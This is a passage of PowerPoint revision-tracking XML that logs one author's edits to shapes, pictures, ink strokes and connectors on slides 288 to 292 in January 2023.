            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="53" creationId="{6DF90DE9-7A9F-55CC-BC76-7E23D23F6FF0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:11.598" v="4357" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="63" creationId="{2C919E2C-DA70-7F4A-8494-B38527A91408}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:10.870" v="4356"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="64" creationId="{394BF607-6AF6-A1B4-4E63-2889A6F6DDE9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:17.868" v="4361" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="66" creationId="{54961169-32AE-F0E4-A072-B640F6776E01}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:17.500" v="4360" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="67" creationId="{3AFE2E29-CAFC-D2B3-BAC3-AEE9CD09B70C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:24.528" v="4364"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="68" creationId="{162237FF-B0DE-DC05-77E9-C5379F14BD3D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:24.528" v="4364"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="69" creationId="{956E9EBA-DE3E-7955-E081-B1345714AA50}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:51:39.370" v="4393" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:cxnSpMk id="8" creationId="{44BE6D64-0AFD-1E33-EFA6-0F4580EED80C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:38:40.183" v="4215" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:cxnSpMk id="58" creationId="{D11FBF83-DDB7-FF11-B1E9-018E97B44857}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:40:30.156" v="7451" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="232623193" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:39:57.247" v="7448" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:spMk id="2" creationId="{2CF777FA-E1D8-E035-7718-D1F0CC106070}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:44:34.500" v="4342" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:spMk id="11" creationId="{20D0D0E5-2127-EA4E-ED14-107B93973974}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:56:31.556" v="4441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:spMk id="14" creationId="{664FDD82-8354-6659-6075-BB767040D2B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:24:52.949" v="4123"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:grpSpMk id="9" creationId="{23361043-17BF-FCF7-CEE1-CC13BECE5822}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:25:09.656" v="4127" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:picMk id="3" creationId="{6B7B070A-27D2-3DD9-20B4-2F4CABB44293}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:24:28.191" v="4117" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:picMk id="5" creationId="{170A578B-5F8F-DB7F-D991-854AFCCC2604}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:40:30.156" v="7451" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:picMk id="6" creationId="{10009E38-E798-65DC-6D0B-ECF9B27777D0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:24:53.723" v="4125" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:inkMk id="6" creationId="{D4E9B9B7-FCD6-83C0-8BAE-B531A269E8D7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:24:53.325" v="4124" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:inkMk id="7" creationId="{C3EA911C-9ECD-0216-AF70-3C5B0EE53AE7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:24:52.949" v="4123"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:inkMk id="8" creationId="{D813CAAD-A994-5647-596A-2963F3B4BEE5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:25:01.272" v="4126" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:inkMk id="10" creationId="{652CFC86-1BFF-9FD2-43FE-624D2E674974}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:44:44.960" v="4344" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="232623193" sldId="289"/>
            <ac:cxnSpMk id="13" creationId="{25AB8517-0564-912C-57D7-0DA8C389ECC5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:29:30.501" v="5116" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4045325148" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:29:30.501" v="5116" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4045325148" sldId="290"/>
            <ac:spMk id="4" creationId="{16B4F18B-6EC4-804B-2869-21BC2B033EB7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:28:38.830" v="5102" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4045325148" sldId="290"/>
            <ac:spMk id="5" creationId="{97A82F02-3232-F033-2324-D622C5E16E68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:28:38.830" v="5102" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4045325148" sldId="290"/>
            <ac:picMk id="3" creationId="{2DCDEFFB-00CA-9BF2-FEF0-E7E6B0CAC1E9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:28:40.204" v="5103" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4045325148" sldId="290"/>
            <ac:picMk id="7" creationId="{3AB05413-1A92-8D1C-0E64-A4B7B8550525}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:29:21.951" v="5104" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4045325148" sldId="290"/>
            <ac:cxnSpMk id="9" creationId="{49F493ED-C724-4994-D54E-12DCACF69F2C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:45:29.455" v="7661" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4144336584" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:45:29.455" v="7661" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4144336584" sldId="291"/>
            <ac:spMk id="4" creationId="{FC1A2BD8-5C60-39C5-3340-832AB7CA5FAE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:44:25.855" v="7610" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4144336584" sldId="291"/>
            <ac:picMk id="3" creationId="{68275514-EB4F-B792-054E-13B0ACEE8949}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:57:51.614" v="4445" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4143516835" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:36:42.294" v="3965" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="10" creationId="{D4501CA1-67E0-3568-4284-29C6718C712A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:41:17.894" v="4277" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="13" creationId="{55AA2B1E-0AAB-FA94-DE25-ACAB9D28CE7F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:39:05.646" v="4000" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="16" creationId="{C741C304-35AA-CC27-08BF-9927C2D93DB6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:37:56.938" v="3987" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="26" creationId="{C950225A-7F12-AD28-6992-8209FDCB53B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:56:57.527" v="4057" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="27" creationId="{39963A9A-58FF-2017-CBE1-F5ABC3A2944C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:54:47.213" v="4436" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="63" creationId="{3FBB6E74-F0D7-315C-1C03-716FC83D00C7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:57:51.614" v="4445" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:spMk id="65" creationId="{89215F5A-E418-45B7-9B46-B8A86F1EB34E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:45.373" v="4089"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="46" creationId="{687D8934-23AE-39BA-AE8E-5C4CC4BB929A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:58.402" v="4094"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="49" creationId="{B34B04B3-8A5C-C781-33DF-17BD26AE36E5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:13.170" v="4101"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="53" creationId="{C6E03DF1-A9B1-B349-B770-8D52B90B5328}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:13.170" v="4101"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="56" creationId="{5D09B4FD-94EE-F194-B409-10CB283DC9DB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:41:44.656" v="4282"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="59" creationId="{5A0E0475-4FAB-07ED-B61C-25F11067EA39}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:41:53.397" v="4286"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:grpSpMk id="62" creationId="{E1BFDF89-BBA6-B33E-271D-B04A51F5D33B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:56:53.305" v="3555" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="3" creationId="{3844BABC-E3BE-A9FF-A871-78C2D61204B0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:36:17.995" v="3958" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="5" creationId="{26106789-8FAE-CE7F-1965-E77EAF46BFC6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:00:40.135" v="3561" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="7" creationId="{3AAA5F8B-8C67-62BA-3B75-D8C4382B2DD3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:36:21.430" v="3959" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="9" creationId="{A2B6E63F-7CE1-A833-D065-0AE4E83B64C2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T16:36:34.699" v="3963" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="19" creationId="{EEA197DC-7B6A-E74B-88DA-9E2AEE1D9C95}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:27:41.144" v="4073" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:picMk id="33" creationId="{90E4D246-A44B-B6B8-44BF-4E16F30C01C2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:45.373" v="4089"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="44" creationId="{1543F0EB-D628-EBDA-9C4E-4CCA958540D7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:45.373" v="4089"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="45" creationId="{0698E70E-0FFD-2316-B123-3FD426C649D4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:58.402" v="4094"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="47" creationId="{0CD4FC0C-25D0-6424-5727-21413F219BC2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:29:58.402" v="4094"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="48" creationId="{79D4CAC7-6FD3-C1B7-920E-8255323ED66B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:01.691" v="4095" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="50" creationId="{1ADEF727-0268-0B78-3956-7CC2E233CBDC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:13.170" v="4101"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="51" creationId="{650C1816-2B7E-9BA4-6AF1-4945714DF147}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:13.170" v="4101"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4143516835" sldId="292"/>
            <ac:inkMk id="52" creationId="{8B74AC87-FC56-D190-B436-06FA4F710B70}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T17:30:13.170" v="4101"/>
          <ac:inkMkLst>
            <pc:docMk/>
